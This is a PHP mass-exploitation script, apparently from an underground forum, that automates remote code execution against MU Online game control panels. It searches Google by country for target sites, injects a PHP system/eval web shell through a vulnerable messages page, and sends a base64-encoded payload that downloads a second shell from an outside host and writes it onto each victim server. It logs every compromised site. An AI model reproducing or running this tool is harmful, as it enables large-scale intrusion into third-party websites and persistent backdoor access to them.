<?

php
/**
* MU Online Control Panel Remote Code Execution.
* Author: Ahlspiess
* Ref: http://w3.tbd.my/thread-5711.html
* Note: Dork tu agak gak sile tukar ye.
*/
class MUAutoPWN {
var $rceshell = "<!--MUAUTOPWN<?php @system(\$_REQUEST[c]);@eval(\$_REQU
EST[p]); ?>-->";
var $phpshell = "cD1zdHJpcHNsYXNoZXMoZndyaXRlKGZvcGVuKFwkX1BPU1Rbel0sXCR
fUE9TVFthXSksZmlsZV9nZXRfY29udGVudHMoXCRfUE9TVFtlXSkpKTsmej1tZXNzYWdlLnBocCZhPXc
mZT1odHRwOi8vdGFyZ2V0c2VjdXJpdHlpbmRpYS5jb20veG1scnBjL3gudHh0";
var $payload = "form_submit=1&user=MUAutoPWN&mail=MUAutoPWN@gmail.com&te
xt=%s";
var $pwned = "cD1lY2hvKFwkX1BPU1RbZWNob10pOyZlY2hvPUFobGlTeXVyZ2FDcmV3";
var $vulnfile = "/sub_pages/messages/messages.php";
var $shell = "/sub_pages/messages/message.php";
var $country = array('MIL','AF','AL','DZ','AS','AD','AO','AI','AQ','AG',
'AR','AM','AW','AU','AT','AZ','BS','BH','BD','BB','BY','BE','BZ','BJ','BM','BT',
'BO','BA','BW','BV','BR','IO','BN','BG','BF','BI','KH','CM','CA','CV','KY','CF',
'TD','CL','CN','CX','CC','CO','KM','CG','CD','CK','CR','CI','HR','CY','CZ','DK',
'DJ','DM','DO','TL','EC','EG','SV','GQ','ER','EE','ET','FK','FO','FJ','FI','FR',
'GF','PF','TF','GA','GM','GE','DE','GH','GI','GR','GL','GD','GP','GU','GT','GN',
'GW','GY','HT','HM','HN','HK','HU','IS','IN','ID','IQ','IE','IL','IT','JM','JP',
'JO','KZ','KE','KI','KW','KG','LA','LV','LB','LS','LR','LY','LI','LT','LU','MO',
'MK','MG','MW','MY','MV','ML','MT','MH','MQ','MR','MU','YT','MX','FM','MD','MC',
'MN','MS','MA','MZ','NA','NR','NP','NL','AN','NC','NZ','NI','NE','NG','NU','NF',
'MP','NO','OM','PK','PW','PS','PA','PG','PY','PE','PH','PN','PL','PT','PR','QA',
'RE','RO','RU','RW','KN','LC','VC','WS','SM','ST','SA','SN','CS','SC','SL','SG',
'SK','SI','SB','SO','ZA','GS','KR','ES','LK','SH','PM','SR','SJ','SZ','SE','CH',
'TW','TJ','TZ','TH','TG','TK','TO','TT','TN','TR','TM','TC','TV','UG','UA','AE',
'GB','US','UM','UY','UZ','VU','VA','VE','VN','VG','VI','WF','EH','YE','ZM','ZW')
;
var $time;
function __construct() {
global $argv;
if(!$argv[1]) die("Usage: php $argv[0] country_code");
if(!in_array(strtoupper($argv[1]), $this->country))
{
die("Tak de dlm senarai!");
}
else
{
$this->time = time();
$result = $this->google("mu+online", $country);
foreach($result as $count)
{
foreach($count as $links)
{
$this->save(dirn
ame(__FILE__)."/GoogleResult_{$this->time}.txt", $links."\n", 'a');
$this->Exploit($
links);
}
}
}

}
function Exploit($link) {
$link = str_replace("/interstitial?url=", "", $link);
$this->e("[+] $link");
if($this->isOK($link.$this->vulnfile))
{
if(!$this->PwnED($link.$this->vulnfile))
{
if($this->connect($link, 1, spri
ntf($this->payload, $this->rceshell)))
{
if($this->PwnED(
$link.$this->vulnfile))
{
$this->e("[RCE] ".$link.$this->vulnfile);
$this->save(dirname(__FILE__)."/RCEShell.txt", "[RCE] ".$link.$this->vulnfile."\
n", 'a');
if($this->connect($link.$this->vulnfile, 1, $this->decode($this->phpshell)) && $
this->isOK($link.$this->shell))
{
$this->e("[Shell] ".$link.$this->shell);
$this->save(dirname(__FILE__)."/Shell.txt", "[Shell] ".$link.$this->shell."\n",
'a');
}
else
{
$this->e("[Shell] ".$link.$this->shell);
}
}
else
{
$this->e("[RCE] ".$link.$this->vulnfile." - Failed");
}
}
}
else
{
$this->e("[Duplicate] $link");
$this->save(dirname(__FILE__)."/
MUDuplicate_{$this->time}.txt", "[Duplicate] ".$link."\n", 'a');
}
}
}
function PwnED($site) {
if(preg_match("/AhliSyurgaCrew/", $this->connect($site, 1, $this
->decode($this->pwned))))

{
return 1;
}
else
{
return 0;
}
}
function isOK($site) {
$c = $this->connect($site);
if(preg_match("/200 OK/", $c))
{
return 1;
}
else
{
return 0;
}
}
function google($dork, $country) {
$this->e("[+] Start google search for '".$dork."");
for($i = 0; $i < 900; $i+=100) {
$fp = $this->connect("http://www.google.com.my/custom?nu
m=100&hl=en&cr=country".$country."&safe=off&client=pub-8993703457585266&ei=ZoUyT
LCmOI-UrAeP79z2Bg&q=".$dork."&start=".$i."&sa=N");
#$fp = $this->connect("http://www.google.com.my/custom?n
um=100&hl=en&safe=off&client=pub-8993703457585266&ei=ZoUyTLCmOI-UrAeP79z2Bg&q=".
$dork."&start=".$i."&sa=N");
@preg_match_all("/<h2 class=(.*?)><a href=\"(.*?)\" clas
s=(.*?)>/", $fp, $links);
$result[] = $links[2];
}
$this->e("[+] Google search for '".$dork."' finished");
$total = 0;
foreach($result as $count) {
foreach($count as $links) {
$total++;
}
}
$this->e("[+] Total result found: ".$total);
if(isset($result)) {
return $result;
} else {
return 0;
}
}
function connect($url, $post = 0, $postfields = '') {
$ch = curl_init();
/*$proxy = "202.71.104.228";
$port = "54321";
curl_setopt($ch, CURLOPT_PROXY, $proxy);
curl_setopt($ch, CURLOPT_PROXYPORT, $port);*/
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 15);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_URL, $url);

curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Wi

ndows NT 6.0; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 ( .NET CLR 3.5.307
29; .NET4.0E)");
curl_setopt($ch, CURLOPT_COOKIEJAR, dirname(__FILE__).'/Cookie_'
.$this->time.'.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, dirname(__FILE__).'/Cookie_
'.$this->time.'.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
if($post > 0) {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postfields);
}
$data = curl_exec($ch);
if($data) {
return $data;
} else {
return 0;
}
}
function decode($str) {
return base64_decode($str);
}
function save($filename, $text, $mode) {
$f = fopen($filename, $mode);
fwrite($f, $text);
fclose($f);
}
function e($text) {
print $text."\r\n";
}
}
$obai = new MUAutoPWN;
?>